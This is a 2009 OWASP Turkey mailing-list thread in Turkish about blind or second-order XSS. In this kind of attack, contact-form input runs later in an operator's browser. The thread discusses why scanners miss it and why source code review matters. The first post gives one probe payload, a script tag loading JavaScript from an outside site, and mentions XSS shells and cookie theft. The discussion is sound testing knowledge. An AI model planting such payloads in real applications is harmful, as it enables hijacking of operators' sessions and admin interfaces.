[Owasp-turkey] Gizli XSS'ler

Deniz CEVIK denizcev at gmail.com
Fri Oct 23 03:18:19 EDT 2009


Bu tip XSS problemleri, senin örnek olarak yolladığın %u encoded
backdoor ve benzeri bir çok sorunu güvenlik denetimleri ile tespit
etmek oldukça zor. Tüm bunlar aslında kaynak kodu incelemenin ne kadar
önemli olduğunun bir göstergesi.

İyi Çalışmalar.

2009/10/22 Bedirhan Urgun <bedirhanurgun at gmail.com>:
> Testlerde her zaman uygulamanin kullandigi butun kullanici profillerine
> ulasip, bunlari testlerde kullanmak mumkun olmuyor. Hele prod ortamlarda. O
> acidan testlerinde buna da yer vermen ve basarili olarak gerceklemen
> testlerin kalitesi acisindan bence buyuk bir arti. Otomatik olarak
> out-of-band channel sqli bulmaya calisan araclar var ama bunu hic gormedim
> :).
>
> Genel olarak "second order injection" diyollar. Second Order SQLi, Second
> Order XSS, Second Order bilmem ne...
>
>
> 21 Ekim 2009 18:28 tarihinde Deniz CEVIK <denizcev at gmail.com> yazdı:
>>
>> Selam arkadaşlar,
>>
>> Bildiğiniz üzere genel olarak XSS'ler 3 kategoriye ayrılıyor, Stored,
>> Reflected ve Dom-Based. Bu XSS tiplerini webapp scanner yazılımları
>> ile bulmak oldukça kolay. Ancak bunlar dışında kullanıcı girdisini
>> alan fakat girilen bilgileri görüntülemeyen, çıktı olarak "bilgiler
>> elimize ulaştı, eyvallah..." gibisinden mesajlar üreten uygulamalar da
>> belkide yukarıdakilerden daha ciddi sıkıntılar oluşturabilecek XSS
>> saldırılarından etkilenebiliyor.
>>
>> Özellikle yazılımcılar kullanıcı girdilerinden çıktı üreten sayfalarda
>> XSS kontrollerini etkin bir şekilde yapmasına rağmen, bu tip
>> sayfalarda bu kontrolleri yapmayı göz ardı edebiliyorlar. İletişim
>> formları, bize ulaşın gibi formlar aracılığı ile yollanan bilgiler bir
>> operator tarafından yine browser ile erişilen bir arabirimle
>> işleniyorsa, operator browserinde istenilen scriptleri çalıştırmak
>> mümkün olabilir. Uygulamalardaki bu tip problemleri ise otomatik
>> tarama araçları ile tespit etmek malesef mümkün değil. Üstelik
>> genellikle yerel ağa erişim, cms arabirimine erişim cookilerini
>> toplama gibi ciddi sorunlar ile karşılaşılabiliyor.
>>
>> Bu tip problemleri tespit etmek için <SCRIPT
>> SRC="http://www.site.com/xss.jpg"></SCRIPT> gibi ifadeleri parametre
>> değeri olarak yollayıp, kendi web sitemizin loglarına bakarak erişim
>> olup olmadığını kontrol edip, ilgili uygulamanın XSS açığından
>> etkilenip etkilenmediğini belirleyebiliriz. Benzer şekilde XSS shell
>> açmakda mümkün olabilir. :=) Bu xss yöntemi bir stored xss tipi olarak
>> nitelendirilebilir sanırım ama gizli xss diye adlandırmak daha hoş
>> duruyor.
>>
>> Son günlerde bu problemlerle çok sık karşılatığım ve göz ardı
>> edildiğini gördüğüm için sizlerle paylaşmak istedim.
>>
>> İyi Çalışmalar.
>> _______________________________________________
>> Owasp-turkey mailing list
>> Owasp-turkey at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>
>
>
> --
> Bedirhan Urgun
> http://www.webguvenligi.org
> http://www.owasp.org/index.php/Turkey
>
> Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>


More information about the Owasp-turkey mailing list